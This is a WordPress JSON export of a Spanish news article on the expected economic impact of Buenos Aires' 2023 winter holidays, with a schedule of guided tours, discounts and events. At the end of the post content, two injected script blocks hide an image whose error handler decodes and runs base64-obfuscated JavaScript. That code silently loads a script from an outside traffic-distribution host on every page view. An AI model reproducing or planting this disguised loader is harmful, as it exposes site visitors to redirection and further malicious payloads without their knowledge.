{"id":2854,"date":"2023-07-14T12:44:16","date_gmt":"2023-07-14T15:44:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2854"},"modified":"2025-08-14T00:12:45","modified_gmt":"2025-08-14T03:12:45","slug":"las-vacaciones-de-invierno-dejaran-un-impacto-de-mas-de-60-mil-millones-en-la-ciudad-de-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2854","title":{"rendered":"Las vacaciones de invierno dejar\u00e1n un impacto de m\u00e1s de $60 mil millones en la Ciudad de Buenos Aires"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-color has-text-color has-background\" style=\"background-color:#896605\"><strong><em>Gracias al impulso de los fines de semana largos de 2023, la capital nacional espera un incremento superior al 210% en el gasto de los visitantes con respecto al mismo per\u00edodo de 2022.<\/em><\/strong><\/h4>\n\n\n\n<p>Previo al comienzo de las vacaciones de invierno, que representan para la Ciudad de Buenos Aires una nueva oportunidad de abrir las puertas a un gran caudal de visitantes nacionales e internacionales, el Observatorio Tur\u00edstico adelant\u00f3 que durante este receso de julio&nbsp;<strong>se espera que la actividad deje en la capital nacional un impacto econ\u00f3mico aproximado de $63.930 millones<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"2857\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-1024x683.jpg\" alt=\"\" class=\"wp-image-2857\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-2048x1365.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-1920x1280.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Floralis-Generica-REC_13-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"blob:https:\/\/circuitosalta.com.ar\/bcdda4c4-c3a5-4dff-aa8b-fc19dc2ddd18\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"2856\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-1024x681.jpg\" alt=\"\" class=\"wp-image-2856\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-1024x681.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-1536x1022.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-2048x1363.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-1068x711.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-1920x1278.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Bicicletas-PAL_4-631x420.jpg 631w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Durante el transcurso de 2023, los fines de semana largos han dado lugar a un trabajo permanente por parte del Ente de Turismo de la Ciudad de Buenos Aires de renovar la oferta tur\u00edstica, cultural y gastron\u00f3mica, que se vio reflejado en un crecimiento sostenido en relaci\u00f3n al n\u00famero de visitantes y en la ocupaci\u00f3n en los hoteles de todas las categor\u00edas.&nbsp; En ese sentido, cabe recordar que durante las vacaciones de invierno de 2022 un total de 474.670 mil turistas visitaron Buenos Aires y la ocupaci\u00f3n hotelera promedio fue del 70 %.<\/p>\n\n\n\n<p><em>\u00abLa tasa de ocupaci\u00f3n promedio de fines de semana largos que tuvimos en el \u00faltimo a\u00f1o nos ha motivado a generar propuestas tur\u00edsticas innovadoras desde el sector p\u00fablico y a trabajar con el privado para desarrollar tanto la oferta consolidada como la emergente en la Ciudad y posicionarnos como uno de los principales destinos para conocer y disfrutar. En ese marco, esperamos las vacaciones de invierno con mucho optimismo porque confiamos en el trabajo hecho en el \u00faltimo tiempo y estamos convencidos de que ser\u00e1 un nuevo punto de partida para lo que resta del a\u00f1o\u00bb<\/em>, expres\u00f3&nbsp;<strong>Lucas Delfino, presidente del Ente de Turismo de la Ciudad de Buenos Aires.<\/strong><\/p>\n\n\n\n<p>De esta manera, el Entur anunci\u00f3 las propuestas para los fines de semana de las vacaciones de invierno 2023, entre las que se incluyen visitas guiadas, circuitos fotogr\u00e1ficos, paseos y espect\u00e1culos al aire libre para todas las edades. Adem\u00e1s, habr\u00e1 descuentos y beneficios en experiencias inmersivas y locales gastron\u00f3micos. Toda la programaci\u00f3n de actividades est\u00e1 disponible en&nbsp;<a href=\"https:\/\/turismo.buenosaires.gob.ar\/vacacionesdeinvierno\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/turismo.buenosaires.gob.ar\/vacacionesdeinvierno<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-1024x683.jpg\" alt=\"\" class=\"wp-image-2855\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-1536x1024.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-2048x1365.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-1068x712.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-1920x1280.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/image-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Cronograma de actividades de las Vacaciones de Invierno 2023:<\/strong><\/p>\n\n\n\n<p>Lado emergente (s\u00e1bado 15 y 22 de julio)<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>11 y 12.30 h\u00a0<strong>Circuito guiado \u00abCultura tanguera\u00bb.<\/strong>\u00a0Se trata de un recorrido por Villa Crespo destinado a adultos que permite conocer detalles de la identidad porte\u00f1a a trav\u00e9s de su m\u00fasica. El circuito comienza en la Plaza Gurruchaga (Gurruchaga 1040) y termina en el Monumento a Osvaldo Pugliese.<\/li>\n\n\n\n<li>11.30 h.&nbsp;<strong>Visita inclusiva: \u00abCasco hist\u00f3rico\u00bb.<\/strong>&nbsp;Un paseo guiado inclusivo por el Casco Hist\u00f3rico, que te permitir\u00e1 conocer en profundidad los lugares m\u00e1s emblem\u00e1ticos de los or\u00edgenes de la Ciudad y del pa\u00eds. Cuenta con int\u00e9rpretes en Lengua de Se\u00f1as Argentina durante todo el recorrido. El circuito es accesible para personas en silla de ruedas.<\/li>\n\n\n\n<li>14 y 15 h.&nbsp;<strong>Circuito guiado \u00abViaje fant\u00e1stico a la vida bohemia del 1900\u00bb.<\/strong>&nbsp;Es un recorrido teatralizado para ni\u00f1os que muestra los sitios del barrio de Boedo m\u00e1s representativos del arte popular. Durante al circuito, que inicia en la esquina Homero Manzi, un gu\u00eda de turismo, un bandoneonista, un payaso, una pitonisa, un equilibrista y otros legendarios personajes evocar\u00e1n los antiguos bares del barrio, la murga, el carnaval y su impronta tanguera en las figuras de Mercedes Simone, Osvaldo Pugliese y Carlos Gardel.<\/li>\n\n\n\n<li>16 y 17.30 h.&nbsp;<strong>Circuito fotogr\u00e1fico \u00abHistoria y democracia en Av. de Mayo\u00bb.&nbsp;<\/strong>En conmemoraci\u00f3n al 40\u00ba aniversario del regreso a la democracia, este recorrido destinado al p\u00fablico joven iniciar\u00e1 en el Congreso y terminar\u00e1 en la Plaza de Mayo, permitiendo tomar im\u00e1genes de los sitios hist\u00f3ricos ubicados a lo largo de una de las principales avenidas de la Ciudad. Cabe mencionar que quienes lleguen a los restaurantes \u00abEl Imparcial\u00bb y \u00abEl Globo\u00bb con la pulsera identificatoria de la participaci\u00f3n en las visitas guiadas, tendr\u00e1n un descuento de 15% en su consumici\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>Lado tradicional (domingo 16 y 23 de julio)<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>11 y 12.30 h.&nbsp;<strong>Circuito guiado \u00abCasco hist\u00f3rico\u00bb.<\/strong>&nbsp;Este itinerario, ideado para el segmento adulto, recorre el centro neur\u00e1lgico de la Ciudad de Buenos Aires para conocer los lugares m\u00e1s emblem\u00e1ticos a trav\u00e9s de su historia, cultura y arquitectura. El recorrido comienza en Florida 50 y termina en la Casa Rosada, frente a la Plaza de Mayo.<\/li>\n\n\n\n<li>14 y 15 h.&nbsp;<strong>Circuito guiado \u00abLos inmigrantes que poblaron La Boca\u00bb.&nbsp;<\/strong>A trav\u00e9s de este recorrido teatralizado destinado al p\u00fablico infantil, los visitantes podr\u00e1n revivir la historia de uno de los barrios m\u00e1s identificativos de la Ciudad. En el circuito, que comienza en Av. Don Pedro de Mendoza 1900, gu\u00edas de turismo y un grupo de actores conducir\u00e1n a los visitantes por las calles del barrio para que descubran algunos de los personajes m\u00e1s representativos de la gran ola de inmigraci\u00f3n europea.<\/li>\n\n\n\n<li>16 y 17.30 h.&nbsp;<strong>Circuito guiado \u00abLa arquitectura de las embajadas de Buenos Aires\u00bb.<\/strong>&nbsp;Este recorrido, que tiene a la Plaza Grand Bourg como punto de encuentro, propone a los j\u00f3venes conocer en detalle la estructura de las embajadas ubicadas en los barrios de Palermo y Recoleta.<\/li>\n<\/ul>\n\n\n\n<p>Experiencias inmersivas<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Los mi\u00e9rcoles 12, 19 y 26, la muestra&nbsp;<strong>Meet Vincent Van Gogh<\/strong>&nbsp;ubicada en el Campo de Polo (Av. del Libertador 4096),<strong>&nbsp;<\/strong>ofrecer\u00e1 150 beneficios de 2&#215;1 para ingresos de media hora.<\/li>\n\n\n\n<li>Los martes 11 y 18,&nbsp;<strong>Mundo Gea<\/strong>&nbsp;ofrecer\u00e1 un 15% de descuento en la compra del combo Gea marina, Gea terrestre o Pasaporte Mundo Gea. El descuento aplicar\u00e1 tanto en la compra de los tickets a trav\u00e9s de la web as\u00ed como tambi\u00e9n en la boleter\u00eda de Ecoparque, en Av. Gral. Las Heras 4155.<\/li>\n<\/ul>\n\n\n\n<p>Paseos<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Del 8 al 23 de julio, las empresas&nbsp;<strong>Buenos Aires Bus<\/strong>&nbsp;y<strong>&nbsp;Buenos Aires City Bus<\/strong>&nbsp;ofrecer\u00e1n un boleto sin cargo para ni\u00f1os de hasta 11 a\u00f1os en la compra de dos tickets de adulto.<\/li>\n\n\n\n<li>Con respecto a los paseos n\u00e1uticos, los lunes y martes entre el 8 y el 23 de julio,&nbsp;<strong>Sturla Viajes<\/strong>&nbsp;ofrecer\u00e1 un 2&#215;1 en la experiencia \u00abPostales de Buenos Aires\u00bb comprando los tickets en la boleter\u00eda de Cecilia Grierson 400<\/li>\n\n\n\n<li>Por su parte, los s\u00e1bados entre el 8 y el 23,&nbsp;<strong>Humberto M<\/strong>&nbsp;pondr\u00e1 a disposici\u00f3n un 20% de descuento en la experiencia de almuerzo y navegaci\u00f3n. Adem\u00e1s, los mi\u00e9rcoles, viernes y s\u00e1bados entre el 8 y el 23 de julio, la empresa ofrecer\u00e1 un 20% de descuento en sunset y open bar, una propuesta que consiste en dos horas de barra libre (incluye bebidas nacionales, tragos, cerveza y gaseosas) + navegaci\u00f3n. Propuesta exclusiva para mayores de 18 a\u00f1os.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Otras propuestas<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Los d\u00edas 14, 15, 21 y 22 de julio, el&nbsp;<strong>Edificio Cassar\u00e1<\/strong>, ubicado en Av. de Mayo 1190, ofrecer\u00e1 acceso gratuito de 16 a 19 a quienes se inscriban previamente. En el lugar, se lleva a cabo la muestra \u00abOCIO\u00bb, en la que los artistas Marcella Casal, Gast\u00f3n Bejarano, Soledad Miguens y Adriana Cervi\u00f1o exponen diversas obras que se podr\u00e1n descubrir a lo largo de esta visita autoguiada.<\/li>\n\n\n\n<li>Los s\u00e1bados 15 y 22 de 11 a 15 h, estar\u00e1 disponible la propuesta&nbsp;<strong>Dibujando la Ciudad<\/strong>, destinada a ni\u00f1os de entre 4 y 10 a\u00f1os. La actividad, que tendr\u00e1 lugar frente al CAT M\u00f3vil, plantea un espacio para que los ni\u00f1os dibujen o coloreen su propio obelisco o c\u00fapula de la Ciudad. Al terminar, se les entregar\u00e1 un n\u00famero y se realizar\u00e1 el sorteo para los participantes. El ganador se har\u00e1 acreedor de un voucher de una experiencia tur\u00edstica para disfrutar en familia. Cabe mencionar que la actividad es con cupos limitados por orden de llegada.<\/li>\n\n\n\n<li>Los s\u00e1bados 15 y 22 desde las 16 h, se llevar\u00e1 adelante un&nbsp;<strong>show musical de Brass ensamble DGEART<\/strong>, una agrupaci\u00f3n de vientos en movimiento que se especializa en intervenciones en espacios p\u00fablicos. El evento tendr\u00e1 lugar en el Obelisco y es abierto al p\u00fablico.<\/li>\n<\/ul>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Gracias al impulso de los fines de semana largos de 2023, la capital nacional espera un incremento superior al 210% en el gasto de los visitantes con respecto al mismo per\u00edodo de 2022. Previo al comienzo de las vacaciones de invierno, que representan para la Ciudad de Buenos Aires una nueva oportunidad de abrir las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2858,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21,17],"tags":[],"class_list":{"0":"post-2854","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2854"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2854"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2854\/revisions"}],"predecessor-version":[{"id":7025,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2854\/revisions\/7025"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2858"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2854"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2854"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}